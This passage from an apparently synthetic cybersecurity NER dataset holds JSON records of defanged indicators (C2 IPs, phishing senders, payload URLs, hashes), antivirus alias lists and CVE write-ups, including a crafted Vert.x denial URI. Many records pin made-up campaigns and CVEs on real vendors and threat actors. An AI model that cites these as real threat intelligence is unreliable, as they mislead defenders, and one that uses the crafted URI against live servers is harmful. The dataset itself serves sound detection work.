Network forensics identified connections to 19[.]40[.]80[.]96 and node-cdn[.]online. Email headers traced the initial vector to info@document-share[ . ]link. File C:\\Windows\\System32\\agent.py (MD5: 2fc8739d4c5ab2b5afcec4540af3074f) was identified as the initial dropper. A staging URL hxxps://data-mail[ . ]dev/secure/token resolved to 220 [ . ] 44 [ . ] 67 [ . ] 83. Secondary artifact hash: MD5: cfb71a80eb61496f0b8dcb2e661fabd9.", "spans": {"Indicator: 19.40.80.96": [[296, 313]], "Indicator: node-cdn.online": [[318, 335]], "Indicator: info@document-share.link": [[380, 408]], "Indicator: 2fc8739d4c5ab2b5afcec4540af3074f": [[450, 482]], "Indicator: hxxps://data-mail.dev/secure/token": [[537, 575]], "Indicator: 220.44.67.83": [[588, 618]], "Indicator: cfb71a80eb61496f0b8dcb2e661fabd9": [[650, 682]]}, "info": {"id": "synth_v2_01215", "source": "defanged_augment"}} {"text": "A backdoor also known as: Worm/W32.DipNet.139264 W32/DipNet.f Trojan.Win32.DipNet.emkm W32/Dipnet.F Trojan.Netdepix.B Win32/Dipnet.NAD Net-Worm.Win32.DipNet.f Worm.DipNet!vTuZ7jF3dLw Worm.Win32.DipNet.139264[h] W32.W.DipNet.f!c Virus.Win32.Part.a Worm.Win32.Dipnet.NAD BackDoor.Xdoor.351 Worm.DipNet.Win32.8 BehavesLike[ . ]Win32[ . ]Trojan[ . ]ch W32/Dipnet.XULH-0302 Worm/DipNet.a WORM/DipNet.b W32/Netdepix.B!worm Worm[Net]/Win32.DipNet Win32/Dipnet.worm.139264 Worm:Win32/DipNet.H Win32/Oddbob.E Net-Worm.DipNet W32/Oddbob.E.worm Backdoor.Win32.Xdoor Worm/Dipnet.M Worm.Win32.DipNet.aMVE", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Trojan.ch": [[308, 347]]}, "info": {"id": "cyner2_train_001439", "source": "defanged_augment"}} {"text": "Trend Micro published a threat intelligence report linking OilRig to a new campaign exploiting CVE-2024-19363 in Cisco ASA. The attackers deployed TrickBot via Merlin, establishing C2 communication with 10[.]124[.]52[.]179 and mailapi[.]io. A secondary payload was downloaded from hxxp://updategateway[ . ]live/api/v2/auth. 
The malware binary (MD5: 07249a544d17e701e0372ed140c27327) was dropped to /etc/cron.d/sam.hive. Phishing emails were sent from noreply@identity-verify[ . ]cc targeting enterprise users. A backup C2 server was identified at 218 [ . ] 61 [ . ] 21 [ . ] 89.", "spans": {"Organization: Trend Micro": [[0, 11]], "Vulnerability: CVE-2024-19363": [[95, 109]], "System: Cisco ASA": [[113, 122]], "Malware: TrickBot": [[147, 155]], "Indicator: 10.124.52.179": [[203, 222]], "Indicator: mailapi.io": [[227, 239]], "Indicator: http://updategateway.live/api/v2/auth": [[281, 322]], "Indicator: 07249a544d17e701e0372ed140c27327": [[349, 381]], "Indicator: noreply@identity-verify.cc": [[451, 481]], "Indicator: 218.61.21.89": [[547, 577]]}, "info": {"id": "synth_v2_00018", "source": "defanged_augment"}} {"text": "Microsoft MSRC published a threat intelligence report linking Star Blizzard to a new campaign exploiting CVE-2025-45322 in Cisco ASA. The attackers deployed Dridex via Metasploit, establishing C2 communication with 192 [ . ] 86 [ . ] 33 [ . ] 94 and gateway-proxy[ . ]info. A secondary payload was downloaded from hxxp://portalmail[.]online/gate.php. The malware binary (SHA1: f41c15beab8bb6c53694a6b74a6693a860692dee) was dropped to /usr/local/bin/payload.bin. Phishing emails were sent from updates@secure-verify[.]net targeting enterprise users. A backup C2 server was identified at 172 [ . ] 102 [ . ] 206 [ . 
] 32.", "spans": {"Organization: Microsoft MSRC": [[0, 14]], "Vulnerability: CVE-2025-45322": [[105, 119]], "System: Cisco ASA": [[123, 132]], "Malware: Dridex": [[157, 163]], "Indicator: 192.86.33.94": [[215, 245]], "Indicator: gateway-proxy.info": [[250, 272]], "Indicator: http://portalmail.online/gate.php": [[314, 349]], "Indicator: f41c15beab8bb6c53694a6b74a6693a860692dee": [[377, 417]], "Indicator: updates@secure-verify.net": [[493, 520]], "Indicator: 172.102.206.32": [[586, 618]]}, "info": {"id": "synth_v2_00248", "source": "defanged_augment"}} {"text": "IOC Bulletin - Latrodectus Campaign:\nNetwork Indicators:\n- 10[.]205[.]20[.]236\n- 192 [ . ] 251 [ . ] 22 [ . ] 10\n- 39[.]64[.]41[.]136\n- mailrelay[ . ]dev\n- cachegateway[.]tech\nURLs:\n- hxxps://storage-login[.]online/assets/js/payload.js\n- hxxp://mail-static[ . ]cc/api/v2/auth\nEmail Senders:\n- alert@mail-service[.]info\n- billing@auth-check[ . ]org\nFile Indicators:\n- SHA1: c071fbae3550fb7e50e7d112a7f0d450f3ae2ad5\n- SHA1: fefcc6e631c1ef450715220f048b04f50993f717\n- Drop path: /tmp/update.dll", "spans": {"Malware: Latrodectus": [[15, 26]], "Indicator: 10.205.20.236": [[59, 78]], "Indicator: 192.251.22.10": [[81, 112]], "Indicator: 39.64.41.136": [[115, 133]], "Indicator: mailrelay.dev": [[136, 153]], "Indicator: cachegateway.tech": [[156, 175]], "Indicator: hxxps://storage-login.online/assets/js/payload.js": [[184, 235]], "Indicator: http://mail-static.cc/api/v2/auth": [[238, 275]], "Indicator: alert@mail-service.info": [[293, 318]], "Indicator: billing@auth-check.org": [[321, 347]], "Indicator: c071fbae3550fb7e50e7d112a7f0d450f3ae2ad5": [[373, 413]], "Indicator: fefcc6e631c1ef450715220f048b04f50993f717": [[422, 462]]}, "info": {"id": "synth_v2_01366", "source": "defanged_augment"}} {"text": "The Vert.x Web static handler component cache can be manipulated to deny the access to static files served by the handler using specifically crafted request URI.\n\n\nThe issue comes from an improper 
implementation of the C. rule of section 5.2.4 of RFC3986 and is fixed in Vert.x Core component (used by Vert.x Web): hxxps://github[.]com/eclipse-vertx/vert.x/pull/5895 \n\n\n\nSteps to reproduce\nGiven a file served by the static handler, craft an URI that introduces a string like bar%2F..%2F after the last / char to deny the access to the URI with an HTTP 404 response. For example hxxps://example[.]com/foo/index.html can be denied with hxxps://example[ . ]com/foo/bar%2F..%2Findex.html\n\nMitgation\nDisabling Static Handler cache fixes the issue.\n\n\n\nStaticHandler staticHandler = StaticHandler.create().setCachingEnabled(false);", "spans": {"Indicator: https://github.com/eclipse-vertx/vert.x/pull/5895": [[316, 367]], "Indicator: https://example.com/foo/index.html": [[580, 616]], "Indicator: https://example.com/foo/bar%2F..%2Findex.html": [[636, 685]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-1002"}} {"text": "JuiceLedger is a threat actor known for infostealing through their JuiceStealer .NET assembly. They have evolved from spreading fraudulent applications to conducting supply chain attacks, targeting PyPI contributors with phishing campaigns and typosquatting. Their malicious packages contain a code snippet that downloads and executes JuiceStealer, which has evolved to support additional browsers and Discord. Victims of JuiceLedger attacks are advised to reset passwords and report any suspicious activity to security@pypi[ . ]org.", "spans": {"Indicator: security@pypi.org": [[511, 532]], "System: .NET": [[80, 84]], "System: Discord": [[402, 409]], "Vulnerability: phishing": [[221, 229]]}, "info": {"source": "defanged_augment", "name": "JuiceLedger"}} {"text": "IOC Bulletin - SmokeLoader Campaign:\nNetwork Indicators:\n- 118 [ . ] 245 [ . ] 209 [ . ] 222\n- 20 [ . ] 121 [ . ] 223 [ . ] 88\n- 5 [ . ] 17 [ . ] 46 [ . ] 179\n- staticmail[ . ]club\n- relaynode[ . 
]xyz\nURLs:\n- hxxps://cachecloud[.]site/api/v2/auth\n- hxxp://apilogin[.]top/login\nEmail Senders:\n- contact@identity-verify[ . ]cc\n- alert@urgent-notice[.]online\nFile Indicators:\n- SHA256: 0a15bd5951703f091bd9efc7ca0720d1173973a627624c704fe12d231461e0f4\n- SHA256: 0e0aa25ec710d059739c30dd0662252817cd8f33c114157c66830f53b70a5b9f\n- Drop path: /opt/app/bin/helper.sh", "spans": {"Malware: SmokeLoader": [[15, 26]], "Indicator: 118.245.209.222": [[59, 92]], "Indicator: 20.121.223.88": [[95, 126]], "Indicator: 5.17.46.179": [[129, 158]], "Indicator: staticmail.club": [[161, 180]], "Indicator: relaynode.xyz": [[183, 200]], "Indicator: hxxps://cachecloud.site/api/v2/auth": [[209, 246]], "Indicator: http://apilogin.top/login": [[249, 276]], "Indicator: contact@identity-verify.cc": [[294, 324]], "Indicator: alert@urgent-notice.online": [[327, 355]], "Indicator: 0a15bd5951703f091bd9efc7ca0720d1173973a627624c704fe12d231461e0f4": [[383, 447]], "Indicator: 0e0aa25ec710d059739c30dd0662252817cd8f33c114157c66830f53b70a5b9f": [[458, 522]]}, "info": {"id": "synth_v2_01470", "source": "defanged_augment"}} {"text": "Artifact Analysis for Royal campaign:\nStage 1 dropper at /var/tmp/taskhost.exe - SHA1: f8e95e214e3679b5d836b6292ed4f7e3cb9acc91\nStage 2 loader at /var/tmp/beacon.dll - SHA256: 7c812af944df48ca140539c161c7859d9e6133dae2cb848605149fe4122ce059\nFinal payload at /dev/shm/backdoor.elf - SHA1: 6d846d93d899729fe7bbac0619454d9e46234e20\nExfiltration module - SHA1: 63ca06c5b1e4acfdd0266369c4ce0d22318bfff4\nAll stages communicated with 10[.]30[.]174[.]190. 
Nmap signatures detected in Stage 2.", "spans": {"Malware: Royal": [[22, 27]], "Indicator: f8e95e214e3679b5d836b6292ed4f7e3cb9acc91": [[87, 127]], "Indicator: 7c812af944df48ca140539c161c7859d9e6133dae2cb848605149fe4122ce059": [[176, 240]], "Indicator: 6d846d93d899729fe7bbac0619454d9e46234e20": [[288, 328]], "Indicator: 63ca06c5b1e4acfdd0266369c4ce0d22318bfff4": [[357, 397]], "Indicator: 10.30.174.190": [[427, 446]]}, "info": {"id": "synth_v2_01919", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nerspan: Initialize options_len before referencing options.\n\nThe struct ip_tunnel_info has a flexible array member named\noptions that is protected by a counted_by(options_len)\nattribute.\n\nThe compiler will use this information to enforce runtime bounds\nchecking deployed by FORTIFY_SOURCE string helpers.\n\nAs laid out in the GCC documentation, the counter must be\ninitialized before the first reference to the flexible array\nmember.\n\nAfter scanning through the files that use struct ip_tunnel_info\nand also refer to options or options_len, it appears the normal\ncase is to use the ip_tunnel_info_opts_set() helper.\n\nSaid helper would initialize options_len properly before copying\ndata into options, however in the GRE ERSPAN code a partial\nupdate is done, preventing the use of the helper function.\n\nBefore this change the handling of ERSPAN traffic in GRE tunnels\nwould cause a kernel panic when the kernel is compiled with\nGCC 15+ and having FORTIFY_SOURCE configured:\n\nmemcpy: detected buffer overflow: 4 byte write of buffer size 0\n\nCall Trace:\n \n __fortify_panic+0xd/0xf\n erspan_rcv.cold+0x68/0x83\n ? ip_route_input_slow+0x816/0x9d0\n gre_rcv+0x1b2/0x1c0\n gre_rcv+0x8e/0x100\n ? raw_v4_input+0x2a0/0x2b0\n ip_protocol_deliver_rcu+0x1ea/0x210\n ip_local_deliver_finish+0x86/0x110\n ip_local_deliver+0x65/0x110\n ? 
ip_rcv_finish_core+0xd6/0x360\n ip_rcv+0x186/0x1a0\n\nReported-at: hxxps://launchpad[ . ]net/bugs/2129580", "spans": {"Indicator: https://launchpad.net/bugs/2129580": [[1450, 1488]], "System: Linux kernel": [[7, 19]], "Vulnerability: buffer overflow": [[1058, 1073]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-71128"}} {"text": "A backdoor also known as: Trojan[ . ]Crypt[ . ]ES Trojan[ . ]Crypt[ . ]ES Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan[.]Crypt[.]ES Trojan.Win32.Crypt.ewgrry Trojan[ . ]Crypt[ . ]ES Trojan[.]Crypt[.]ES BehavesLike.Win32.BadFile.lm Backdoor:Win32/Huceqoo.A Trojan.Win32.Z.Crypt.73728.BQ Trojan/Win32.Scar.C8074 Trojan[.]Crypt[.]ES BScope.Trojan.Dropper.we Trj/GdSda.A Trojan[.]Crypt[.]ES Win32/Trojan.b63", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Trojan.Crypt.ES": [[26, 49], [50, 73], [117, 136], [163, 186], [187, 206], [315, 334], [372, 391]]}, "info": {"id": "cyner2_train_000412", "source": "defanged_augment"}} {"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G PE_VIRUX.R Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Worm.GBYU-0953 W32[.]Virut[.]CF Win32/Virut.17408 PE_VIRUX.R Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg Worm.Win32.Delf.579072 Virus.Win32.Virut.CE Win32.Virut.56 Virus.Virut.Win32.1938 Virus.Win32.Ramnit W32/Worm.APDA Win32/Virut.bt Virus/Win32.Virut.ce W32.Virut.lJ4T Virus.Win32.Virut.ce HEUR/Fakon.mwf Virus.Virut.14 W32/Sality.AO Virus.Win32.Virut.M", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: W32.Virut.CF": [[146, 162]]}, "info": {"id": "cyner2_train_002866", "source": "defanged_augment"}} {"text": "CrowdStrike detected a multi-stage attack chain. The initial phishing email from report@auth-check[.]org contained a link to hxxp://secureproxy[.]live/collect. This redirected to hxxps://login-gateway[ . ]club/collect on login-backup[ . ]com. 
A secondary email from report@urgent-notice[.]online pointed to hxxp://syncsecure[.]online/assets/js/payload.js which delivered BatLoader. The final payload callback was hxxp://static-data[.]club/callback resolving to 192 [ . ] 213 [ . ] 38 [ . ] 171 via securenode[ . ]net.", "spans": {"Organization: CrowdStrike": [[0, 11]], "Indicator: report@auth-check.org": [[81, 104]], "Indicator: hxxp://secureproxy.live/collect": [[125, 158]], "Indicator: https://login-gateway.club/collect": [[179, 217]], "Indicator: login-backup.com": [[221, 241]], "Indicator: report@urgent-notice.online": [[266, 295]], "Indicator: http://syncsecure.online/assets/js/payload.js": [[307, 354]], "Malware: BatLoader": [[371, 380]], "Indicator: hxxp://static-data.club/callback": [[413, 447]], "Indicator: 192.213.38.171": [[461, 493]], "Indicator: securenode.net": [[498, 516]]}, "info": {"id": "synth_v2_01846", "source": "defanged_augment"}} {"text": "Malware Analysis Report: BumbleBee (MD5: df5ee9ef1c10d7be6b403da2975112d7). Upon execution on SonicWall SMA, the sample creates C:\\Users\\admin\\Downloads\\svchost.exe and injects into legitimate processes. Network analysis shows beaconing to 209 [ . ] 201 [ . ] 20 [ . ] 89 every 60 seconds and DNS queries to relaycache[.]live. The second stage was fetched from hxxps://portal-gateway[ . ]top/wp-content/uploads/doc.php and written to /opt/app/bin/taskhost.exe. The payload uses Burp Suite-style techniques for defense evasion. 
A secondary hash (SHA1: 98a9aba421b7fcbc90318065dc0b2b1883d01c51) was extracted from the unpacked payload.", "spans": {"Malware: BumbleBee": [[25, 34]], "Indicator: df5ee9ef1c10d7be6b403da2975112d7": [[41, 73]], "System: SonicWall SMA": [[94, 107]], "Indicator: 209.201.20.89": [[240, 271]], "Indicator: relaycache.live": [[308, 325]], "Indicator: hxxps://portal-gateway.top/wp-content/uploads/doc.php": [[361, 418]], "Indicator: 98a9aba421b7fcbc90318065dc0b2b1883d01c51": [[551, 591]]}, "info": {"id": "synth_v2_00510", "source": "defanged_augment"}} {"text": "Blog Post by Tenable: Tracking Scattered Spider's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2020-26049 against Atlassian Confluence deployments. The initial access vector involves spear-phishing emails from service@secure-verify[ . ]net delivering Play. Post-compromise, the attackers deploy ShadowPad and use PsExec for reconnaissance. C2 infrastructure includes 172 [ . ] 84 [ . ] 0 [ . ] 244 and nodeapi[ . ]top. A staging server at hxxps://logincache[ . ]xyz/collect hosts additional tooling. Key artifact: /etc/cron.d/update.dll (SHA1: 62f7316c6465a4675d457101dd9a70c5db65c6df).", "spans": {"Organization: Tenable": [[13, 20]], "Vulnerability: CVE-2020-26049": [[127, 141]], "System: Atlassian Confluence": [[150, 170]], "Indicator: service@secure-verify.net": [[246, 275]], "Malware: Play": [[287, 291]], "Malware: ShadowPad": [[331, 340]], "Indicator: 172.84.0.244": [[403, 433]], "Indicator: nodeapi.top": [[438, 453]], "Indicator: hxxps://logincache.xyz/collect": [[475, 509]], "Indicator: 62f7316c6465a4675d457101dd9a70c5db65c6df": [[580, 620]]}, "info": {"id": "synth_v2_01691", "source": "defanged_augment"}} {"text": "QakBot C2 server 178[.]62[.]3[.]223 was first observed on 2026-02-17 communicating over port 443. A second QakBot command-and-control node at 27[.]133[.]154[.]218:443 appeared on 2026-03-04. 
Both servers are hosted on commercial VPS infrastructure and use TLS encryption to evade detection.", "spans": {"Malware: QakBot": [[0, 6], [107, 113]], "Indicator: 178.62.3.223": [[17, 35]], "Indicator: 27.133.154.218": [[142, 162]]}, "info": {"id": "otx_00003", "source": "defanged_augment"}} {"text": "A backdoor also known as: Win32.Redrac.A@mm Win32.Redrac.A@mm Win32.Redrac.A@mm Trojan.Win32.Redrac.enor W32.Redrac@mm Win32/Redrac.A Email-Worm.Win32.Redrac Win32.Redrac.A@mm Worm.Redrac!vQPr8wluFnM W32.W.Redrac!c Win32.Redrac.A@mm Worm.Win32.Redrac.A Win32.Redrac.A@mm Win32.HLLM.Redrac Worm.Redrac.Win32.1 BehavesLike[ . ]Win32[ . ]AdwareRBlast[ . ]cc W32/Redrac.AFIQ-7566 Worm/Sramota.axa WORM/Redrac.A Worm[Email]/Win32.Redrac Win32.Redrac.E90817 Trojan/Win32.Xema Worm:Win32/Redrac.A@mm Virus.Win32.Heur.l W32/Gnome.C.worm Win32.Redrac.A@mm I-Worm/Redrac.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.AdwareRBlast.cc": [[309, 354]]}, "info": {"id": "cyner2_train_006407", "source": "defanged_augment"}} {"text": "Internal name : snd[.]dll File format : PE32 DLL MD5: 8c4d896957c36ec4abeb07b2802268b9 Linker version : 11.0 , Microsoft Visual Studio Linker timestamp : 2015.07.24 12:07:27 ( GMT ) Exported functions :", "spans": {"Indicator: snd.dll": [[16, 25]], "Indicator: 8c4d896957c36ec4abeb07b2802268b9": [[54, 86]], "Organization: Microsoft": [[111, 120]]}, "info": {"id": "cyberner_stix_train_007986", "source": "defanged_augment"}} {"text": "APT29 used Rubeus for credential dumping and BloodHound for lateral movement. Credentials were exfiltrated to 151 [ . ] 90 [ . ] 165 [ . ] 131. The attacker pivoted to 181[.]174[.]252[.]216 and dropped C:\\Windows\\Temp\\procdump64.exe (MD5: a3889edbfc83694edfd257f9b0b7d090). C2 traffic was routed through fast-cdn[[ . 
]]xyz.", "spans": {"Indicator: 151.90.165.131": [[110, 142]], "Indicator: 181.174.252.216": [[168, 189]], "Indicator: a3889edbfc83694edfd257f9b0b7d090": [[239, 271]], "Indicator: fast-cdn[.]xyz": [[304, 322]]}, "info": {"id": "synth_00057", "source": "defanged_augment"}} {"text": "Vulnerability Advisory: CVE-2026-44676 is a critical use-after-free affecting Windows 11. FBI confirmed active exploitation by Forest Blizzard in the wild. Exploitation delivers BatLoader (SHA1: 94b48ca18ad4d8cd33111a1921277cca12b27f3e) which is dropped to /home/user/.config/shell.php. The exploit payload is hosted at hxxp://storage-gateway[ . ]org/assets/js/payload.js and communicates to 147 [ . ] 136 [ . ] 127 [ . ] 60 for C2.", "spans": {"Vulnerability: CVE-2026-44676": [[24, 38]], "Vulnerability: use-after-free": [[53, 67]], "System: Windows 11": [[78, 88]], "Organization: FBI": [[90, 93]], "Malware: BatLoader": [[178, 187]], "Indicator: 94b48ca18ad4d8cd33111a1921277cca12b27f3e": [[195, 235]], "Indicator: hxxp://storage-gateway.org/assets/js/payload.js": [[320, 371]], "Indicator: 147.136.127.60": [[392, 424]]}, "info": {"id": "synth_v2_00735", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan.Tinba.WR4 Trojan/Tinba[.]be Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Tinba.dqteol TrojWare[.]Win32[.]Roitamit[.]BE Trojan.PWS.Tinba.153 Trojan.Tinba.Win32.1916 TR/Crypt.ZPACK.137753 Trojan/Win32.Skeeyah.R216296 Trojan.Tinba Win32/Tinba[ . ]BE Trojan.Tinba!GN4G+jbMfD0 Trojan.Win32.Tinba W32/Tinba[ . 
]BE!tr Win32/Trojan.6ed", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Tinba.be": [[50, 60]], "Indicator: TrojWare.Win32.Roitamit.BE": [[130, 162]], "Indicator: Tinba.BE": [[278, 290], [339, 351]]}, "info": {"id": "cyner2_train_003961", "source": "defanged_augment"}} {"text": "A backdoor also known as: Ransom.Exxroute.A3 Trojan.Ransom.Lukitos.1 Ransom_CERBER.SM37 Win32.Trojan.WisdomEyes.16070401.9500.9999 W32.Ramnit!dr Ransom_CERBER.SM37 Trojan.PWS.Sphinx.2 BehavesLike[.]Win32[.]Ransomware[.]cc Trojan:Win32/CeeInject.MJ!bit Trojan/Win32.Fareit.R189070 Trj/GdSda.A", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Ransomware.cc": [[184, 221]]}, "info": {"id": "cyner2_train_004471", "source": "defanged_augment"}} {"text": "Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort[ . ]org . The presence of code to exfiltrate data to removable drives when there is physical access to a compromised computer may indicate that Machete operators could have a presence in one of the targeted countries , although we cannot be certain . During this heist , APT38 waited for a holiday weekend in the respective countries to increase the likelihood of hiding the transactions from banking authorities .", "spans": {"Organization: we": [[364, 366]], "Organization: banking": [[529, 536]], "Indicator: Snort.org": [[130, 143]]}, "info": {"id": "cyberner_stix_train_004430", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed Merlin artifacts at C:\\ProgramData\\loader.exe. Memory dump analysis confirmed execution of Impacket. Registry modifications pointed to persistence via /usr/local/bin/payload.bin. Network forensics identified connections to 115[.]156[.]83[.]41 and proxyproxy[.]link. Email headers traced the initial vector to it@login-portal[ . ]tech. 
File /var/tmp/runtime.dll (MD5: 85a1466e4e86f82b6d0fe8baa0dc4781) was identified as the initial dropper. A staging URL hxxp://secure-secure[ . ]site/assets/js/payload.js resolved to 192[.]165[.]213[.]176. Secondary artifact hash: SHA1: 9fbafb71b8fccb96f76d8d18debe2e07d6de6604.", "spans": {"Indicator: 115.156.83.41": [[295, 314]], "Indicator: proxyproxy.link": [[319, 336]], "Indicator: it@login-portal.tech": [[381, 405]], "Indicator: 85a1466e4e86f82b6d0fe8baa0dc4781": [[439, 471]], "Indicator: hxxp://secure-secure.site/assets/js/payload.js": [[526, 576]], "Indicator: 192.165.213.176": [[589, 610]], "Indicator: 9fbafb71b8fccb96f76d8d18debe2e07d6de6604": [[643, 683]]}, "info": {"id": "synth_v2_01210", "source": "defanged_augment"}} {"text": "But some clues , such as the existence of a hidden menu for operator control , point to a manual installation method – the attackers used physical access to a victim ’ s device to install the malware . According to trusted third-party reporting , HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace , telecommunications , and finance industries . Later at 20:57 , the attackers became active on the compromised machine and proceeded to download the archiving tool WinRAR . 89[.]34[.]237[.]118 808 hxxp://89[.]34[.]237[.]118:808/Rar32.exe . Based on the use of domain names they registered , the group started out in the business of fake / rogue anti - virus products in 2007 .", "spans": {"Organization: aerospace": [[333, 342]], "Organization: telecommunications": [[345, 363]], "Organization: finance industries": [[370, 388]], "Indicator: 89.34.237.118 808": [[517, 540]], "Indicator: http://89.34.237.118:808/Rar32.exe": [[541, 581]], "Malware: fake / rogue anti - virus products": [[676, 710]]}, "info": {"id": "cyberner_stix_train_000574", "source": "defanged_augment"}} {"text": "The message was sent from an account created under her name on lesser known email provider 1 1's Mail[ . 
]com, a common tactic in recent months, with a link to a file hosted on Dropbox and an additional credential phishing attempt.", "spans": {"System: email provider": [[76, 90]], "Organization: Dropbox": [[177, 184]], "Indicator: Mail.com": [[97, 109]]}, "info": {"id": "cyner2_train_003219", "source": "defanged_augment"}} {"text": "Figure 8 . Additionally , there is evidence to suggest APT33 targeted Saudi Arabian and Western organizations that provide training , maintenance and support for Saudi Arabia 's military and commercial fleets . The malicious DLL exports the same function names as the original mcvsocfg[.]dll library . HHS HC3 warned that the stolen credentials may have been used to compromise a number of healthcare organizations and enterprises in other industries .", "spans": {"Organization: military": [[178, 186]], "Organization: commercial": [[191, 201]], "Indicator: mcvsocfg.dll": [[277, 291]], "Organization: HHS HC3": [[302, 309]], "Organization: healthcare organizations": [[390, 414]], "Organization: enterprises in other industries": [[419, 450]]}, "info": {"id": "cyberner_stix_train_000061", "source": "defanged_augment"}} {"text": "Powerview[ . ]ps1 — This PowerShell-based module for network reconnaissance is part of the PowerSploit penetration testing framework .", "spans": {"Indicator: Powerview.ps1": [[0, 17]]}, "info": {"id": "cyberner_stix_train_003560", "source": "defanged_augment"}} {"text": "TensorFlow is an end-to-end open source platform for machine learning. An attacker can cause a runtime division by zero error and denial of service in `tf.raw_ops.QuantizedBatchNormWithGlobalNormalization`. This is because the implementation(hxxps://github[.]com/tensorflow/tensorflow/blob/55a97caa9e99c7f37a0bbbeb414dc55553d3ae7f/tensorflow/core/kernels/quantized_batch_norm_op.cc) does not validate all constraints specified in the op's contract(hxxps://www[ . ]tensorflow[ . ]org/api_docs/python/tf/raw_ops/QuantizedBatchNormWithGlobalNormalization). 
The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.", "spans": {"Indicator: https://github.com/tensorflow/tensorflow/blob/55a97caa9e99c7f37a0bbbeb414dc55553d3ae7f/tensorflow/core/kernels/quantized_batch_norm_op.cc": [[242, 381]], "Indicator: https://www.tensorflow.org/api_docs/python/tf/raw_ops/QuantizedBatchNormWithGlobalNormalization": [[448, 551]], "Vulnerability: denial of service": [[130, 147]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2021-29548"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/io-wq: Use set_bit() and test_bit() at worker->flags\n\nUtilize set_bit() and test_bit() on worker->flags within io_uring/io-wq\nto address potential data races.\n\nThe structure io_worker->flags may be accessed through various data\npaths, leading to concurrency issues. When KCSAN is enabled, it reveals\ndata races occurring in io_worker_handle_work and\nio_wq_activate_free_worker functions.\n\n\t BUG: KCSAN: data-race in io_worker_handle_work / io_wq_activate_free_worker\n\t write to 0xffff8885c4246404 of 4 bytes by task 49071 on cpu 28:\n\t io_worker_handle_work (io_uring/io-wq.c:434 io_uring/io-wq.c:569)\n\t io_wq_worker (io_uring/io-wq.c:?)\n\n\n\t read to 0xffff8885c4246404 of 4 bytes by task 49024 on cpu 5:\n\t io_wq_activate_free_worker (io_uring/io-wq.c:? io_uring/io-wq.c:285)\n\t io_wq_enqueue (io_uring/io-wq.c:947)\n\t io_queue_iowq (io_uring/io_uring.c:524)\n\t io_req_task_submit (io_uring/io_uring.c:1511)\n\t io_handle_tw_list (io_uring/io_uring.c:1198)\n\n\nLine numbers against commit 18daea77cca6 (\"Merge tag 'for-linus' of\ngit://git[.]kernel[.]org/pub/scm/virt/kvm/kvm\").\n\nThese races involve writes and reads to the same memory location by\ndifferent tasks running on different CPUs. 
To mitigate this, refactor\nthe code to use atomic operations such as set_bit(), test_bit(), and\nclear_bit() instead of basic \"and\" and \"or\" operations. This ensures\nthread-safe manipulation of worker flags.\n\nAlso, move `create_index` to avoid holes in the structure.", "spans": {"Indicator: git.kernel.org": [[1116, 1134]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-39508"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix to avoid use f2fs_bug_on() in f2fs_new_node_page()\n\nAs Dipanjan Das reported, syzkaller\nfound a f2fs bug as below:\n\nRIP: 0010:f2fs_new_node_page+0x19ac/0x1fc0 fs/f2fs/node.c:1295\nCall Trace:\n write_all_xattrs fs/f2fs/xattr.c:487 [inline]\n __f2fs_setxattr+0xe76/0x2e10 fs/f2fs/xattr.c:743\n f2fs_setxattr+0x233/0xab0 fs/f2fs/xattr.c:790\n f2fs_xattr_generic_set+0x133/0x170 fs/f2fs/xattr.c:86\n __vfs_setxattr+0x115/0x180 fs/xattr.c:182\n __vfs_setxattr_noperm+0x125/0x5f0 fs/xattr.c:216\n __vfs_setxattr_locked+0x1cf/0x260 fs/xattr.c:277\n vfs_setxattr+0x13f/0x330 fs/xattr.c:303\n setxattr+0x146/0x160 fs/xattr.c:611\n path_setxattr+0x1a7/0x1d0 fs/xattr.c:630\n __do_sys_lsetxattr fs/xattr.c:653 [inline]\n __se_sys_lsetxattr fs/xattr.c:649 [inline]\n __x64_sys_lsetxattr+0xbd/0x150 fs/xattr.c:649\n do_syscall_x64 arch/x86/entry/common.c:50 [inline]\n do_syscall_64+0x35/0xb0 arch/x86/entry/common.c:80\n entry_SYSCALL_64_after_hwframe+0x46/0xb0\n\nNAT entry and nat bitmap can be inconsistent, e.g. 
